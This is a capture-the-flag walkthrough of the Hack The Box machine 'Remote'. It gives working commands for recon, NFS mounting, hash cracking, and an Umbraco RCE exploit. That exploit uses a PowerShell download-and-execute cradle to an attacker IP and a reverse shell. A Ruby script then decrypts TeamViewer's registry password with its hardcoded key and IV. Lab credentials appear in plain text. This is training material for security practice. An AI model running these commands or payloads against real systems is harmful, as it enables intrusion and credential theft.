nmap -A -p- -oA remote 10.129.95.194 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA remote 10.129.95.194

nmap -sU -O -p- -oA remote-udp 10.129.95.194

nikto -h 10.129.95.194:80

ftp 10.129.95.194

whatweb http://10.129.95.194

nmap --script http-enum -p80 10.129.95.194 -oN scan -Pn

mountd shows up in the scan, so NFS is probably running; list its exports:

showmount -e 10.129.95.194

sudo mount -t nfs 10.129.95.194:/site_backups /mnt/nfs

cd /mnt/nfs && ls -la

http://10.129.95.194

searchsploit Umbraco

strings Umbraco.sdf | less -S

We find the administrator's password hash in the dump and save it to a file named hash.

john --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt hash

http://10.129.95.194/umbraco

The login page shows version 7.12.4, which has an authenticated RCE on exploit-db (46153); mirror it locally:

searchsploit -m 46153

https://github.com/samratashok/nishang

mv Invoke-PowerShellTcp.ps1 Powershell.ps1

Edit Powershell.ps1 so it connects back to your Kali IP on port 443 (append the Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.135 -Port 443 line at the end of the script).

In 46153.py set the login, password and host variables for the target, and point cmd at Powershell.ps1 on your web server:

admin@htb.local:baconandcheese

Start the listener and the web server that serves Powershell.ps1 before firing the exploit:

nc -lvnp 443

python3 -m http.server 80

python3 46153.py

The nishang shell is not a real TTY, so we swap the payload for Invoke-ConPtyShell to get a fully interactive shell with a proper terminal size (as with nishang, the Invoke-ConPtyShell call with your IP and port goes at the end of the served script).

Change the value of cmd in 46153.py to the following (the \' escapes are needed because the payload lives inside a single-quoted Python string):

"/c powershell IEX(new-object net.WebClient).downloadString(\'http://10.10.14.135/Invoke-ConPtyShell.ps1\')";

In the nc listener press Ctrl+Z, run stty raw -echo; fg, then press Enter again to get the interactive prompt.

whoami /priv

tasklist

TeamViewer is among the running processes.

locate teamviewer | grep metasploit

The installed TeamViewer is version 7.

TeamViewer 7 keeps the unattended-access password in the registry as an AES-encrypted blob (the SecurityPasswordAES value under its Version7 key); read it with PowerShell:

(Get-ItemProperty -Path 'HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7').SecurityPasswordAES

The blob is AES-128-CBC ciphertext under a key and IV hardcoded in TeamViewer (the Metasploit teamviewer_passwords post module found above contains them), so we write a small script to decrypt it. The password is !R3m0te!

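The decryption script, written here as an added example rather than the author's own (which only survives as a screenshot). It uses the fixed key and IV from the Metasploit teamviewer_passwords module and the value format TeamViewer uses: the password as UTF-16LE, NUL-padded to a 16-byte boundary, encrypted with AES-128-CBC. The registry bytes from the target are not reproduced on this page, so the script constructs a sample blob by encrypting a known password the same way; the function names, the parse helper for PowerShell's {255, 155, ...} output and the sample are assumptions for this demo.

```ruby
require 'openssl'

# Fixed AES-128-CBC key and IV that TeamViewer (up to the versions fixed for
# CVE-2019-18988) uses for the SecurityPasswordAES registry value. These are the
# same bytes the Metasploit teamviewer_passwords post module carries.
TV_KEY = ['0602000000a400005253413100040000'].pack('H*')
TV_IV  = ['0100010067244f436e9b16e48f74f400'].pack('H*')

# Turn the byte list PowerShell prints for a REG_BINARY value,
# e.g. "{255, 155, 28, ...}", into a raw binary string.
def parse_ps_byte_list(text)
  text.scan(/\d+/).map(&:to_i).pack('C*')
end

# Decrypt the registry blob. The plaintext is the password in UTF-16LE,
# NUL-padded up to a 16-byte boundary (no PKCS#7), so OpenSSL padding is
# disabled and the trailing NULs are stripped afterwards.
def decrypt_teamviewer_password(blob)
  raise ArgumentError, 'blob length must be a multiple of 16' unless blob.bytesize % 16 == 0

  cipher = OpenSSL::Cipher.new('AES-128-CBC')
  cipher.decrypt
  cipher.padding = 0
  cipher.key = TV_KEY
  cipher.iv  = TV_IV
  plain = cipher.update(blob) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8', invalid: :replace).sub(/\x00+\z/, '')
end

# Demo-only inverse, used to construct a sample blob because the real registry
# bytes from the target are not reproduced here. It mirrors TeamViewer's format:
# UTF-16LE, NUL-padded to 16 bytes, AES-128-CBC with the fixed key and IV.
def encrypt_teamviewer_password(password)
  utf16 = password.encode('UTF-16LE').b
  utf16 << "\x00" * (16 - utf16.bytesize % 16) if utf16.bytesize % 16 != 0

  cipher = OpenSSL::Cipher.new('AES-128-CBC')
  cipher.encrypt
  cipher.padding = 0
  cipher.key = TV_KEY
  cipher.iv  = TV_IV
  cipher.update(utf16) + cipher.final
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: what Get-ItemProperty would print for this password.
  sample = encrypt_teamviewer_password('!R3m0te!')
  ps_output = "SecurityPasswordAES : {#{sample.bytes.join(', ')}}"
  puts ps_output
  puts "decrypted: #{decrypt_teamviewer_password(parse_ps_byte_list(ps_output))}"
end
```

On Kali, paste the byte list that Get-ItemProperty printed into parse_ps_byte_list and hand the result to decrypt_teamviewer_password. A blob whose length is not a multiple of 16 raises instead of decrypting, and a wrong key or IV shows up as unreadable UTF-16 rather than a clean password, which is the quickest sign that the value came from a TeamViewer version that stores it differently.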
Check whether the TeamViewer password is also valid for the local Administrator over SMB:

crackmapexec smb 10.129.95.194 -u 'Administrator' -p '!R3m0te!'

copyright © 2022 Cu3rv0x, all rights reserved